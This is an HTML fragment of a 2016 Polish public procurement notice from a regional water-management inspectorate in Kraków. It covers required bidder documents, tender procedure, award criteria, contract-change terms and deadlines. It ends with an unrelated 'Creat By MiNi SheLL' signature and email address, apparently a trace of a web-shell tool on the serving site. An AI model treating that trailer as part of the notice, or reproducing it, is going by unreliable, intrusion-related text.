<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 6. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 6.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 6.2.dla weryfikacji osoby (reprezentacji) /innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 9.kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 2. Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: a). zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b). zmiany kont bankowych, c). wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona e). obniżenia wynagrodzenia, o którym mowa §3 ust.1, f). zmiany terminu wykonania umowy z zastrzeżeniem ust.3 3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 08:00, miejsce: MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pok.32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com